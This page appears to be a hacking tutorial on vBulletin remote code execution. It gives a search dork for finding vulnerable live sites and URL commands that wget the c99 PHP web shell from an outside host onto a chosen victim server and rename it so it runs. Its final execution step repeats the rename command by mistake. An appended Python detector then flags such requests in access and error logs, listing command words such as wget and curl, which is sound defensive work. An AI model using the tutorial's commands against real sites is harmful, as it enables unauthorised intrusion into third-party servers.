What is Remote Code Execution? How to Hack Websites
According to Wikipedia, Remote Code Execution can be defined as: “In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution.”
vBulletin RCE Injection
A few websites running vBulletin are vulnerable to Remote Code Execution; by exploiting the vulnerability we can get our PHP backdoor shell uploaded to the website. We’ll use a dork to find the vulnerable website.
Note: Don’t restrict yourself to Google when using dorks; use other search engines too, like Bing, Yahoo, etc. Using multiple search engines will help you find more vulnerable websites.
Dork: inurl:faq.php & intext:"Warning: system() [function.system]"
Now, select any website of your choice from the search result and go to its faq.php page. If the website is vulnerable, you will see the following on the page.
You will get an error similar to: Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1
So, first upload your PHP shell to any free hosting website, or you can use sh3ll.org/c99.txt as it already has an uploaded .txt shell. (We will first upload our shell in .txt form, and later change the extension to .php after the upload process is completed.)
Suppose the vulnerable website is http://www.vulnerable.com/faq.php. So in order to upload our shell enter the following in the URL bar:
http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt
To check if we were able to successfully upload our shell, enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt
Where c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (It might be a little different in some cases.)
-rw-r--r-- 1 nobody nobody
We know that our shell is successfully uploaded to the website; now it’s time to change the file format from .txt to .php in order to execute it on the server.
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)
Now, the file format is changed. It’s time to execute our shell, so to execute it enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.
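From the defending side, the whole sequence above leaves two clear traces: a `cmd` query parameter on faq.php carrying shell metacharacters and command names in the web server access log, and the `system()` warning from `eval()'d code` in the PHP error log. The following Python detector, added here as an example and not code from the original page, scans both. All log lines, IP addresses and paths in it are constructed for the example; the `example.invalid` host is a placeholder, and the error-log format is assumed to be a typical PHP warning line.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined format); not taken from any real server.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /faq.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /faq.php?cmd=cd%20/tmp;wget%20http://example.invalid/c99.txt HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:20 +0000] "GET /faq.php?cmd=cd%20/tmp;ls%20-la%20c99.txt HTTP/1.1" 200 298 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /faq.php?cmd=cd%20/tmp;mv%20c99.txt%20check.php HTTP/1.1" 200 301 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:14:01:12 +0000] "GET /faq.php?cmd=help HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# Constructed PHP error-log line modelled on the warning text quoted in the post
# (path /var/www/html is a placeholder; the page shows it as [path]).
SAMPLE_ERROR_LINE = ("[10-Oct-2023 13:55:36 UTC] PHP Warning:  system() [function.system]: "
                     "Cannot execute a blank command in /var/www/html/faq.php(324) : eval()'d code on line 1")

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CLIENT_RE = re.compile(r"^(?P<ip>\S+) ")
# Characters that chain or substitute commands in a shell string.
SHELL_METACHARS = re.compile(r"[;|&`]|\$\(")
# Command names that have no business appearing in a forum FAQ request.
COMMAND_WORDS = re.compile(r"\b(cd|wget|curl|mv|cp|chmod|ls|cat|sh|bash|php|perl|python)\b")
# system() called from eval()'d code inside faq.php, as in the warning the post quotes.
ERROR_SIGNATURE = re.compile(r"system\(\).*faq\.php\(\d+\) : eval\(\)'d code")


def get_param(query, name):
    """Return the percent-decoded value of one query parameter, or None.

    Splits only on '&' so that ';' inside a value survives as data
    (urllib.parse.parse_qs treated ';' as a separator in older Pythons).
    """
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None


def analyze_line(line):
    """Return a finding dict for a suspicious faq.php?cmd= request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("faq.php"):
        return None
    cmd = get_param(parts.query, "cmd")
    if cmd is None:
        return None
    metachar = SHELL_METACHARS.search(cmd) is not None
    commands = sorted(set(COMMAND_WORDS.findall(cmd)))
    if not metachar and not commands:
        return None          # a lone harmless value such as cmd=help is not flagged
    client = CLIENT_RE.match(line)
    return {
        "client": client.group("ip") if client else "?",
        "cmd": cmd,
        "metachar": metachar,
        "commands": commands,
    }


def scan_access_log(text):
    """Run analyze_line over every line and keep the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


def is_rce_probe_error(line):
    """True when a PHP error-log line matches the system()-from-eval warning."""
    return ERROR_SIGNATURE.search(line) is not None


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{finding['client']}: cmd={finding['cmd']!r} "
              f"metachar={finding['metachar']} commands={finding['commands']}")
    print("error-log signature matched:", is_rce_probe_error(SAMPLE_ERROR_LINE))
```

Three of the five access-log lines are flagged, all from the same client, which is the pattern to correlate on: one source walking through download, listing and rename within a minute. The error-log check catches the probing step even when the access log is missing, because the blank-command warning fires on the very first visit to a vulnerable faq.php. The lasting fix is on the server side: no web request parameter should ever reach `eval()` or `system()`, so patch vBulletin and remove or rewrite any template code that does.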